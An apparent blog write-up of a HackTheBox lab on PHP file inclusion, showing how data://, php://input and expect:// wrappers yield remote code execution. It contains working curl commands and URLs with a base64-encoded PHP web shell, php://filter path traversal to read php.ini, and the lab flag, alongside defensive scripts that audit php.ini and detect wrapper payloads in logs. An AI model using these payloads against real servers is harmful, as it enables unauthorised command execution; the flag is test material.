Huy Phu

Summary

The website content describes methods for achieving Remote Code Execution (RCE) on a web application using PHP file inclusion vulnerabilities, specifically through data, input, and expect PHP wrappers, and provides examples of how to exploit these vulnerabilities when allow_url_include is enabled in the server's PHP configuration.

Abstract

The article titled "HackTheBox — File Inclusion: PHP wrappers for Remote Code Execution" outlines the process of exploiting file inclusion vulnerabilities in PHP applications to achieve RCE. It details the necessity of having allow_url_include enabled in the PHP configuration files located at /etc/php/X.Y/apache2/php.ini for Apache servers or /etc/php/X.Y/fpm/php.ini for Nginx servers. The article explains the use of php://filter to read configuration files, the data:// wrapper for including PHP code via URL, and the php://input wrapper for POST requests. It also discusses the expect PHP extension, which allows direct command execution via URL streams. The author provides step-by-step commands using curl to demonstrate the exploitation of these wrappers to execute arbitrary commands on the server, ultimately leading to the retrieval of a flag file as proof of RCE.

Opinions

  • The author implies that exploiting file inclusion vulnerabilities is a common and effective technique for achieving RCE.
  • The article suggests that checking for allow_url_include and the expect extension is a standard procedure in identifying potential vulnerabilities in PHP applications.
  • The author emphasizes the importance of understanding PHP wrappers to effectively perform Local File Inclusion (LFI) attacks that can lead to RCE.
  • The inclusion of real-world commands and examples indicates the practical application of the techniques discussed, implying that these are proven methods used by security professionals.
  • By encouraging readers to follow for more content and to clap for the post, the author seeks to establish a community of engaged readers interested in cybersecurity topics.

HackTheBox — File Inclusion: PHP wrappers for Remote Code Execution

Data

  • Data wrappers can be used to include external data, including PHP code.
  • The application must have allow_url_include enabled in its config file, which is located at /etc/php/X.Y/apache2/php.ini (Apache) or /etc/php/X.Y/fpm/php.ini (Nginx), where X.Y is the PHP version.
  • Use php://filter to check the config file
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
  • Once we find allow_url_include enabled, we can include external PHP code in the application, for example '<?php system($_GET["cmd"]); ?>' (note that the code must be base64-encoded first):
echo '<?php system($_GET["cmd"]); ?>' | base64
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

The base64 and text/plain parts tell PHP that the data is a base64-encoded plain-text string, so it decodes the string before including it.

Input

  • The input wrapper is similar to the data wrapper in that it also allows external resources to be included. The only difference is that the input wrapper must be used with a POST request:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
  • The input wrapper is usually used when an application does not accept GET requests. If that's the case, we need to modify the above command, as system($_GET["cmd"]) does not work; instead, we use <?php system('id'); ?>

Expect

  • Expect allows users to run commands directly via a URL stream (without creating a web shell, as the other two wrappers do).
  • Expect must be installed and enabled on the application. We can check this the same way we identified the data wrapper, except that we now pipe the decoded php.ini through grep for expect:
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
extension=expect
  • Using expect to execute commands on the application: curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
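The two checks above (allow_url_include for the data and input wrappers, extension=expect for the expect wrapper) are done by hand with base64 and grep. The script below is an added example, not code from the original post or from HackTheBox: it parses a php.ini, reports the settings that make include()-based wrapper attacks possible, and shows a weak configuration beside a hardened one. Both ini excerpts are constructed for the demonstration; the severity labels and the hardened values are my choices, not anything the post prescribes.

```python
import re

# Constructed php.ini excerpts (hypothetical, not copied from any lab host).
# On Debian-style systems the real file lives at /etc/php/X.Y/apache2/php.ini
# (Apache) or /etc/php/X.Y/fpm/php.ini (Nginx + PHP-FPM).
WEAK_PHP_INI = """\
[PHP]
; Whether fopen-style functions may open remote URLs
allow_url_fopen = On
; Whether include/require may load data://, php://input and remote URLs
allow_url_include = On
disable_functions =
open_basedir =
;extension=curl
extension=expect
"""

HARDENED_PHP_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
open_basedir = /var/www/html:/tmp
;extension=expect
"""

_TRUTHY = {"1", "on", "true", "yes"}


def parse_php_ini(text):
    """Minimal php.ini parser: returns (settings dict, list of loaded extensions).
    Comments (';'), blank lines and [section] headers are ignored and the last
    assignment of a key wins, as in PHP. Quoted values containing ';' are not
    handled; this is a simplified parser for auditing purposes."""
    settings, extensions = {}, []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip().strip('"')
        if key == "extension":
            # "extension=expect", "extension=expect.so" and "extension=expect.dll" all load expect
            extensions.append(re.sub(r"\.(so|dll)$", "", value.lower()))
        else:
            settings[key] = value
    return settings, extensions


def is_on(value):
    """PHP accepts several spellings for a boolean ini value."""
    return value.strip().lower() in _TRUTHY


def audit_php_ini(text):
    """Return (severity, setting, message) findings relevant to include()-based
    attacks: which wrappers include() can reach, and whether command execution
    is still available to injected code."""
    settings, extensions = parse_php_ini(text)
    findings = []
    if is_on(settings.get("allow_url_include", "0")):
        findings.append(("high", "allow_url_include",
                         "include/require accept data://, php://input and remote URLs"))
    if is_on(settings.get("allow_url_fopen", "0")):
        findings.append(("medium", "allow_url_fopen",
                         "file functions may open remote URLs"))
    if "expect" in extensions:
        findings.append(("high", "extension=expect",
                         "expect:// stream wrapper is loaded, so include() can reach a shell"))
    if not settings.get("disable_functions", "").strip():
        findings.append(("medium", "disable_functions",
                         "no command-execution functions (system, exec, ...) are disabled"))
    if not settings.get("open_basedir", "").strip():
        findings.append(("low", "open_basedir",
                         "no open_basedir restriction; php://filter can read any file the worker can"))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_PHP_INI), ("hardened", HARDENED_PHP_INI)):
        print(f"== {label} ==")
        for sev, key, msg in audit_php_ini(ini) or [("ok", "-", "no findings")]:
            print(f"[{sev:6}] {key}: {msg}")
```

Run it against a real file with `audit_php_ini(open("/etc/php/7.4/apache2/php.ini").read())`; an empty result on the hardened excerpt shows that turning allow_url_include off and not loading expect removes every wrapper path this post uses, while disable_functions and open_basedir limit what an included file could do even if one slipped through.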

Answer the question

Try to gain RCE using one of the PHP wrappers and read the flag at /

  • First, we check whether the data and expect wrappers are available on the application:
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
  • We see that both expect extension and allow_url_include are enabled.
  • Use either one to get the flag. I'll use the data wrapper.
# Running "ls /" command
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20/

# Display content of the flag
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20/37809e2f8952f06139011994726d9ef1.txt

Answer: HTB{d!$46l3_r3m0t3_url_!nclud3}
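Every request in the walkthrough above leaves a recognisable trace in the web server's access log: a stream wrapper scheme (php://, data:, expect://) or a traversal sequence inside the language parameter. The script below is an added example, not code from the original post or from HackTheBox: it scans Apache combined-format log lines for those patterns and, for data: URIs, base64-decodes the payload so an analyst can see what was handed to include(). The log lines are constructed (client address from the 203.0.113.0/24 documentation range; the request URIs mirror the four wrapper forms shown in the post plus one benign request).

```python
import base64
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (hypothetical client and timestamps).
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 1452
203.0.113.5 - - [10/May/2024:12:00:07 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini HTTP/1.1" 200 93011
203.0.113.5 - - [10/May/2024:12:00:19 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id HTTP/1.1" 200 1521
203.0.113.5 - - [10/May/2024:12:00:25 +0000] "POST /index.php?language=php://input&cmd=id HTTP/1.1" 200 1519
203.0.113.5 - - [10/May/2024:12:00:31 +0000] "GET /index.php?language=expect://id HTTP/1.1" 200 1490
"""

# Apache combined format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream wrappers and URL schemes that should never appear in a file-inclusion parameter.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob|file|ftp|https?):", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def parse_query(target):
    """Split 'path?query' into (path, [(name, decoded value), ...]). The query is
    split on '&' only, because data: URIs legitimately contain ';'."""
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote(name), unquote(value)))
    return path, params


def decode_data_uri(value):
    """For a data: URI with a ';base64,' payload return the decoded text,
    otherwise None."""
    head, sep, payload = value.partition(",")
    if not sep or "base64" not in head.lower():
        return None
    try:
        return base64.b64decode(payload, validate=False).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return None


def detect_wrapper_inclusion(log_text):
    """Return one alert dict per request whose query carries a stream wrapper
    or a directory-traversal sequence in any parameter value."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _, params = parse_query(m.group("target"))
        for name, value in params:
            wrapper = WRAPPER_RE.match(value)
            traversal = TRAVERSAL_RE.search(value)
            if not (wrapper or traversal):
                continue
            scheme = wrapper.group(1).lower() if wrapper else "traversal"
            alerts.append({
                "client": m.group("ip"),
                "time": m.group("ts"),
                "method": m.group("method"),
                "param": name,
                "scheme": scheme,
                "value": value,
                "decoded_payload": decode_data_uri(value) if scheme == "data" else None,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_wrapper_inclusion(SAMPLE_LOG):
        print(f"{a['time']} {a['client']} {a['method']} param={a['param']} scheme={a['scheme']}")
        if a["decoded_payload"]:
            print("  decoded data: payload:", a["decoded_payload"].strip())
```

Because php://input carries its code in the POST body rather than the query string, the log only shows the wrapper name; correlating the alert with the request body needs a WAF or application-level logging. The benign `language=es.php` line produces no alert, which is the behaviour an allowlist-based include (only known language files, no user-supplied schemes) would enforce on the application side.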

Conclusion

  • These are the most common PHP wrappers used in Local File Inclusion attacks, some of which lead to Remote Code Execution.
  • Please clap if you like this post. And don’t forget to follow me for more Cybersecurity content.